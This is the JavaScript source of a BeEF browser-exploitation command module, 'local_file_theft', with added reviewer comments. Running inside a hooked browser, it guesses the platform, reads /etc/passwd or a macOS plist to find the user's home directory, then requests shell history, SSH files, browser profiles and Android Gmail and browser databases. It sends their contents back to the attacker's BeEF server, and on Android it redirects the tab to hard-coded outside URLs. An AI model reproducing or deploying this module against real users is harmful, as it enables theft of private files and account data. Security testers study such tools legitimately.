Path: blob/master/modules/misc/local_file_theft/command.js
//
// Copyright (c) 2006-2025 Wade Alcorn - [email protected]
// Browser Exploitation Framework (BeEF) - https://beefproject.com
// See the file 'doc/COPYING' for copying permission
//

// local_file_theft
//
// Shamelessly plagiarised from kos.io/xsspwn
//
// Purpose: BeEF command module. Inside a hooked browser it picks a platform
// profile (identify), runs that profile's "discover" step, requests a fixed
// list of file paths with XMLHttpRequest (grabFiles) and reports each
// responseText to the BeEF server through beef.net.send.
//
// The <%== @target_file %>, <%= @command_url %> and <%= @command_id %> tokens
// are server-side template placeholders; the file is not valid JavaScript
// until they have been rendered.
//
// Notes for reviewers and defenders:
// - Every read is an XHR to file:/// or to a path that resolves against the
//   hooked page's own URL. NOTE(review): mainstream browsers refuse file://
//   loads from http(s) pages, so this presumably only returns data when the
//   hooked document was itself opened from disk and file-to-file reads are
//   allowed (e.g. Chromium started with --allow-file-access-from-files).
// - result, fileList, functionList, tmp, user, userDir, homedir, tmpfile, i
//   and j are assigned without a declaration, so in sloppy mode they become
//   properties of the page's global object.
// - The android branch navigates the tab to hard-coded http://kos.io/ URLs.
// - Results leave the browser through beef.net.send with a 'result=' prefix.

beef.execute(function() {

  // Last "<key>: <file contents>" string handed to beef.net.send.
  result = '';

  // Declared as an array but used below as a dictionary keyed by platform
  // name; the five string elements are never read in this file.
  fileList = ['linux','mac','ios','android','windows']


  // Per-platform profile: "discover" is the file requested first, "post" maps
  // a label to a path requested afterwards by grabFiles.
  fileList['linux']= {
    // How do we discover users?
    "discover" :'/etc/passwd',

    // Okay, we found them, what do we pillage?
    // Paths are relative to the home directory extracted from /etc/passwd.
    "post" :{
      'bashHistory':'.bash_history',
      'sshHosts':'.ssh/known_hosts',
      'sshKeys':'.ssh/id_rsa.pub',
      'firefoxProfiles':'.mozilla/firefox/profiles.ini',
      'chromeBookmarks':'.config/chromium/Default/Bookmarks'
    }
  }

  fileList['mac']= {
    // How do we discover users?
    "discover" :'/Library/Preferences/com.apple.loginwindow.plist',

    // Okay, we found them, what do we pillage?
    // Same relative paths as the linux profile, appended to /Users/<user>/.
    "post" :{
      'bashHistory':'.bash_history',
      'sshHosts':'.ssh/known_hosts',
      'sshKeys':'.ssh/id_rsa.pub',
      'firefoxProfiles':'.mozilla/firefox/profiles.ini',
      'chromeBookmarks':'.config/chromium/Default/Bookmarks'
    }
  }

  fileList['android']= {
    // Instead of how, just figure out the currently in use appi
    "discover" :'/proc/self/status',

    // Okay, we found them, what do we pillage?
    // Mostly absolute app-data paths; the last entry is a relative path copied
    // from the desktop profiles.
    "post" :{
      'browser_data':'/data/data/com.android.browser/databases/webview.db',
      'browser_data2':'/data/data/com.android.browser/databases/browser.db',
      'gmail_accounts':'/data/data/com.google.android.gm/shared_prefs/Gmail.xml',
      'dolpin_data':'/data/data/mobi.mgeek.TunnyBrowser/databases/webview.db',
      'dolpin_data2':'/data/data/mobi.mgeek.TunnyBrowser/databases/browser.db',
      'chromeBookmarks':'.config/chromium/Default/Bookmarks'
    }
  }

  fileList['ios']= {
    // WHAT IS THIS I DON'T EVEN
    // Empty discover path: the ios discover step requests the current
    // document's own URL.
    "discover" :'',

    "post" :{
      'iPadEtcHosts':'/etc/hosts'
    }
  }

  // functionList below has no 'windows' entry, so the code in this file never
  // requests these paths.
  fileList['windows']= {
    // Meh, who cares
    "discover" :'',

    "post" :{
      'bootini':'/c:/boot.ini',
      'hosts':'/c:/WINDOWS/system32/drivers/etc/hosts'
    }
  }

  fileList['custom']= {
    // user defined
    "discover" :'',

    // The operator-supplied target path is substituted into this string
    // literal by the server-side template.
    "post" :{
      'result':'<%== @target_file %>',
    }
  }


  // One "discover" routine per platform. Each sends an XHR, and when it
  // reaches readyState 4 derives a base directory and calls grabFiles.
  // All routines share the single global `tmp` and return true immediately,
  // before the request has completed.
  functionList = {
    mac:{
      // OS X disovery
      discover : function(){
        tmp = new XMLHttpRequest()
        tmp.open('get',"file:///"+fileList['mac']['discover'])
        tmp.send()
        tmp.onreadystatechange=function(){
          if(tmp.readyState==4){
            // TODO
            // Understand plist format to _reliably_ pull out username with regex
            //user = tmp.responseText.match(/\x03\x57(.*)\x12/)[1];
            // match() returns null when the byte pattern is absent, in which
            // case the [1] access throws inside this callback.
            user = tmp.responseText.match(/\x54(.*)\x12\x01/)[1];
            homedir = "/Users/"+user+"/";
            grabFiles(homedir,"mac")
          }
        }
        return true;
      }
    },

    linux:{
      // Linux username discovery
      discover : function(){
        tmp = new XMLHttpRequest()
        tmp.open('get',"file:///"+fileList['linux']['discover'])
        tmp.send()
        tmp.onreadystatechange=function(){
          if(tmp.readyState==4){
            // Captures the home-directory field of the first passwd entry
            // whose UID and GID are both four digits; throws if none matches.
            userDir = tmp.responseText.match(/[a-z0-9]*:x:[0-9]{4}:[0-9]{4}:[^:]*:([^:]*)/)[1];
            homedir = userDir+"/";

            grabFiles(homedir,"linux")
          }
        }
        return true;
      }
    },


    ios:{
      // Grab ipad stuff
      discover : function(){
        tmp = new XMLHttpRequest()
        tmp.open('get',fileList['ios']['discover'])
        tmp.send()
        tmp.onreadystatechange=function(){
          if(tmp.readyState==4){
            // The discover response is ignored; it only sequences grabFiles.
            homedir = "file:///";
            grabFiles(homedir,"ios")
          }
        }
        return true;
      }
    },

    custom:{
      // Grab custom stuff
      discover : function(){
        tmp = new XMLHttpRequest()
        tmp.open('get',fileList['custom']['discover'])
        tmp.send()
        tmp.onreadystatechange=function(){
          if(tmp.readyState==4){
            // The discover response is ignored; the operator-supplied path is
            // requested under file:/// by grabFiles.
            homedir = "file:///";
            grabFiles(homedir,"custom")
          }
        }
        return true;
      }
    },
    android:{
      // figure out what app (gmail, browser, or dolphin?) android
      discover : function(){
        //document.location="http://kos.io/"
        tmp = new XMLHttpRequest()
        tmp.open('get',fileList['android']['discover'])
        tmp.send()
        tmp.onreadystatechange=function(){
          if(tmp.readyState==4){
            // The package name found in the discover response selects a
            // hard-coded third-party URL and the tab is navigated to it.
            if(/.*android\.gm.*/.test(tmp.responseText)){
              document.location="http://kos.io/gmail"
            } else if(/.*android\.browser.*/.test(tmp.responseText)){
              document.location="http://kos.io/browser"
            } else if(/.*ek\.TunnyBrowser.*/.test(tmp.responseText)){
              document.location="http://kos.io/dolphin"
            }

            grabFiles("/","android")
          }
        }
        return true;
      }
    }


  }


  // Chooses the profile name. Returns "custom" unless the rendered target file
  // is the literal 'autodetect'; otherwise it keys off navigator.userAgent and
  // navigator.platform. Returns undefined when nothing matches.
  function identify(){

    // custom file is specified
    if ('<%== @target_file %>' != 'autodetect') {
      return "custom"

    // determine a good file to steal based on platform
    } else {
      // Android is tested first because its platform string also matches the
      // Linux pattern below.
      if(/.*Android.*/.test(navigator.userAgent)){
        return "android"
      } else if(/Linux.*/i.test(navigator.platform)){
        return "linux"
      } else if(/iP.*/i.test(navigator.platform)){
        return "ios"
      } else if(/.*Mac.*/i.test(navigator.userAgent)){
        return "mac"
      } else if(/.*Windows.*/i.test(navigator.userAgent)){
        return "windows"
      } else if(/.*hpwOS.*/i.test(navigator.platform)){
        return "webos"
      }
    }
  }


  // Runs the discover routine for `os`. functionList only has mac, linux, ios,
  // custom and android, so "windows", "webos" or undefined from identify()
  // make this lookup throw a TypeError.
  function discoverUsers(os){
    return functionList[os]['discover']()
  }


  // Requests every path in fileList[os]['post'] under `dir` and reports the
  // responses. `dir` is joined with "/" unconditionally, so a trailing slash
  // on `dir` yields a doubled slash in the URL.
  function grabFiles(dir,os){
    tmpfile = {}
    for (i in fileList[os]['post']){
      beef.debug('dir = ' + dir);
      beef.debug('fileList: ' + fileList[os]['post'][i]);
      beef.debug(i);
      tmpfile[i] = new XMLHttpRequest()
      tmpfile[i].open ('get',dir+"/"+fileList[os]['post'][i]);
      tmpfile[i].send();

      // Each callback re-scans every request rather than only its own, so a
      // file that has reached readyState 4 is reported again whenever any
      // request changes state. The response text is appended to 'result='
      // without URL-encoding.
      tmpfile[i].onreadystatechange=function(){
        for (j in fileList[os]['post']){
          if(tmpfile[j].readyState==4){
            beef.debug('new returned for: ' + j);
            result = j +": "+ tmpfile[j].responseText;

            beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result);
          }
        }
      }


    }

  }


  // Entry point: pick the profile, then start its discover step.
  discoverUsers(identify());



});